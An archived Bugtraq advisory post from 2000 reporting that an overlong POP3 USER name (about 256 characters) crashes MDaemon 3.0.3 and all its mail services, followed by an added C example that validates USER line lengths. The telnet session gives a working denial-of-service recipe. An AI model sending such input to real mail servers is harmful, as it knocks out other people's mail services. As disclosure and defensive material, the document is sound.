Bugtraq mailing list archives

Deerfield Communications MDaemon Mail Server DoS


From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Wed, 24 May 2000 10:26:29 -0800


Deerfield Communications (the Wingate perpetrators) MDaemon POP server is
vulnerable to bigass usernames causing a DoS.  MDaemon is a mail server
package for 95,98,NT and Win2k.  Many systems that run Deerfield's World
Client web-mail also use MDaemon.

Exploit tested on Win2kpro running MDaemon 3.0.3

telnet example.com 110
+OK example.com POP service ready [1] using MDaemon v3.0.3 R
user ................(x256 more or less but 256 does the trick)
pass b00m!

This kills MDaemon and all of its servers (POP3, IMAP, SMTP)
Nothing is logged. Event viewer says the service has terminated unexpectedly.
With proper research an overflow attack might be possible but I couldn't
find any access violations.
Vendor has been copied on this message.  Not much else to say.

-Cassius
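
The server-side check whose absence the report above points to, as an added example that is not part of the original post and not MDaemon code: a POP3 USER line is length-checked before any byte of the name is copied. The function and constant names are hypothetical; the limits assumed are the 40-character argument of RFC 1939 and the 255-octet command line of RFC 2449.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: whole command line, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: each argument is at most 40 characters */

enum pop3_status { POP3_OK, POP3_ERR_LINE_TOO_LONG, POP3_ERR_ARG_TOO_LONG, POP3_ERR_SYNTAX };

/* Validate one raw "USER <name>" line (len bytes, not NUL-terminated).
 * The name is copied into out only after every length check has passed. */
enum pop3_status pop3_parse_user(const char *buf, size_t len, char out[POP3_MAX_ARG + 1])
{
    static const char verb[] = "USER ";
    const size_t vlen = sizeof verb - 1;
    size_t i, arglen;

    out[0] = '\0';
    if (len > POP3_MAX_LINE)
        return POP3_ERR_LINE_TOO_LONG;   /* reject before looking at content */
    while (len > 0 && (buf[len - 1] == '\r' || buf[len - 1] == '\n'))
        len--;                           /* strip the line terminator */
    if (len <= vlen)                     /* need the verb plus at least one name byte */
        return POP3_ERR_SYNTAX;
    for (i = 0; i < vlen; i++)           /* POP3 keywords are case-insensitive */
        if (toupper((unsigned char)buf[i]) != verb[i])
            return POP3_ERR_SYNTAX;
    arglen = len - vlen;
    if (arglen > POP3_MAX_ARG)
        return POP3_ERR_ARG_TOO_LONG;    /* the server would answer -ERR here */
    for (i = 0; i < arglen; i++)         /* printable ASCII only, no spaces */
        if (!isgraph((unsigned char)buf[vlen + i]))
            return POP3_ERR_SYNTAX;
    memcpy(out, buf + vlen, arglen);     /* arglen <= POP3_MAX_ARG, so this fits */
    out[arglen] = '\0';
    return POP3_OK;
}

int main(void)
{
    char name[POP3_MAX_ARG + 1], flood[5 + 256 + 2]; /* constructed sample input */
    memcpy(flood, "USER ", 5);
    memset(flood + 5, '.', 256);
    memcpy(flood + 261, "\r\n", 2);
    printf("normal name:   %d\n", pop3_parse_user("USER alice\r\n", 12, name));
    printf("256-byte name: %d\n", pop3_parse_user(flood, sizeof flood, name));
    printf("100-byte name: %d\n", pop3_parse_user(flood, 5 + 100, name));
    return 0;
}
```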
